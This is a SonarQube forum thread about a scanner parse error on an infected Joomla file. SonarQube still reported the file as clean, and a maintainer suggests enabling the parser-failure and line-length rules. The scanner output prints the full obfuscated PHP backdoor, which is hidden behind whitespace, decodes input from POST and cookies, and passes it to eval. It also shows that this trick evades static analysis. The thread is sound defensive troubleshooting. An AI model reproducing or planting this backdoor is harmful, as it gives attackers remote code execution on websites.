Sonar-Scanner Parse error causes SonarQube to show a clean bill of heath

JohnC · August 30, 2019, 2:19pm

Sonar-scaner reports it cannot continue to scan file.
SonarQube reports the file as having no issues.

Expected result: sonar-scanner error to be passed to SonarQube and made visible for review.
As this instance is a definite exploit maybe some basic checks could be made such as excessive line length.
This behaviour could be exploited by finding any variation such that the sonar-scanner parser generates false error

SonarQube

sonar-scanner -v
INFO: Scanner configuration file: /usr/local/Cellar/sonar-scanner/4.0.0.1744/libexec/conf/sonar-scanner.properties
INFO: Project root configuration file: NONE
INFO: SonarQube Scanner 4.0.0.1744
INFO: Java 11.0.1 Oracle Corporation (64-bit)
INFO: Mac OS X 10.14.6 x86_64

Output:
ERROR: Unable to parse file [file:///httpdocs/libraries/joomla/uri/uri.php] at line 1
ERROR: Parse error at line 1 column 4760:

 1: <?php .. long line of spaces to fool the eye ...
 $m420204 = 191;$GLOBALS['j6a4c9b7']=Array();global$j6a4c9b7;$j6a4c9b7=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['t155f28c9']="\x2b\x45\x52\x2e\x20\x74\x75\x34\x5f\x72\x44\x43\x4c\x62\x61\x53\x71\x39\x64\x66\x38\x2d\x33\x47\x6b\x28\x79\x31\x59\x60\x7b\x6c\x55\x22\x76\x51\x3b\x56\xa\x4a\x5e\x65\x7d\x5c\x35\x26\x58\x30\xd\x3d\x21\x41\x49\x36\x2a\x37\x6a\x4e\x23\x4d\x3f\x4f\x29\x6e\x2f\x68\x7e\x6d\x3c\x69\x5a\x50\x7a\x77\x54\x63\x70\x4b\x3a\x24\x5d\x9\x40\x73\x7c\x2c\x3e\x57\x78\x32\x5b\x48\x42\x25\x6f\x27\x46\x67";$j6a4c9b7[$j6a4c9b7['t155f28c9'][76].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][14]]=$j6a4c9b7['t155f28c9'][76].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][75].$j6a4c9b7['t155f28c9'][24];$j6a4c9b7[$j6a4c9b7['t155f28c9'][69].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][13]]=$j6a4c9b7['t155f28c9'][75].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][6].$j6a4c9b7['t155f28c9'][63].$j6a4c9b7['t155f28c9'][5];$j6a4c9b7[$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][22]]=$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][6].$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][5].$j6a4c9b7['t155f28c9'][9];$j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][89]]=$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][5].$j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][31].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][63];$j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][17].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][47]]=$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][88].$j6a4c9b7['t155f28c9'][76].$j6a4c9b7['t155f28c9'][31].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][41];$j6a4c9b7[$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][53].$j6a4c9b7['t155f28c9'][55].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][89]]=$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][5].$j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][8].$j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][76].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][5];$j6a4c9b7[$j6a4c9b7['t155f28c9'][56].$j6a4c9b7['t155f28c9'][75].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][53].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][17]]=$_POST;$j6a4c9b7[$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][75]]=$_COOKIE;$ve7a=Array($j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][63].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][67].$j6a4c9b7['t155f28c9'][27]=>$j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][63].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][67].$j6a4c9b7['t155f28c9'][89]);$z80ebb=Array($j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][63].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][67].$j6a4c9b7['t155f28c9'][22]=>$j6a4c9b7['t155f28c9'][9].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][63].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][94].$j6a4c9b7['t155f28c9'][67].$j6a4c9b7['t155f28c9'][7]);foreach(Array($ve7a,$j6a4c9b7[$j6a4c9b7['t155f28c9'][56].$j6a4c9b7['t155f28c9'][75].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][53].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][17]],$z80ebb,$j6a4c9b7[$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][75]])as$r0d00){foreach($r0d00as$gbb00442a=>$vf2f19668){$vf2f19668=@$j6a4c9b7[$j6a4c9b7['t155f28c9'][76].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][14]]($j6a4c9b7['t155f28c9'][91].$j6a4c9b7['t155f28c9'][54],$vf2f19668);$gbb00442a.=$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][21].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][14].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][21].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][53].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][27].$j6a4c9b7['t155f28c9'][21].$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][17].$j6a4c9b7['t155f28c9'][18].$j6a4c9b7['t155f28c9'][55].$j6a4c9b7['t155f28c9'][21].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][55].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][47];$od3c174c=$vf2f19668^$j6a4c9b7[$j6a4c9b7['t155f28c9'][13].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][22].$j6a4c9b7['t155f28c9'][22]]($j6a4c9b7[$j6a4c9b7['t155f28c9'][83].$j6a4c9b7['t155f28c9'][53].$j6a4c9b7['t155f28c9'][55].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][20].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][41].$j6a4c9b7['t155f28c9'][89]]($gbb00442a,($j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][89]]($vf2f19668)/$j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][89]]($gbb00442a))+1),0,$j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][89]]($vf2f19668));$od3c174c=$j6a4c9b7[$j6a4c9b7['t155f28c9'][26].$j6a4c9b7['t155f28c9'][17].$j6a4c9b7['t155f28c9'][7].$j6a4c9b7['t155f28c9'][47]]($j6a4c9b7['t155f28c9'][58],$od3c174c);if($j6a4c9b7[$j6a4c9b7['t155f28c9'][69].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][19].$j6a4c9b7['t155f28c9'][47].$j6a4c9b7['t155f28c9'][89].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][44].$j6a4c9b7['t155f28c9'][13]]($od3c174c)==3){eval/*i7a6e2d50*/($od3c174c[1]($od3c174c[2]));exit();}}} ?><?php

felipebz · August 30, 2019, 2:37pm

Hi! You can activate the rule “PHP parser failure” (php:S2260) and “Lines should not be too long” (php:S103) in your quality profile to see these issues the SonarQube UI.

JohnC · August 30, 2019, 2:39pm

I’ll try that

JohnC · August 30, 2019, 2:54pm

Unable to do that - logged as administrator - I can find the rule but cannot select/deselect it

felipebz · August 30, 2019, 4:04pm

You probably need to create your own quality profile, because the built-in profiles are read-only.

JohnC · August 30, 2019, 4:08pm

cool - any idea why this rule is defaulted to false?
I can see lots of people have requested it in sql/tsql/java/…

JohnC · August 30, 2019, 4:21pm

Yay - it worked (untested yet) - Thank You

JohnC · September 4, 2019, 3:03pm

Working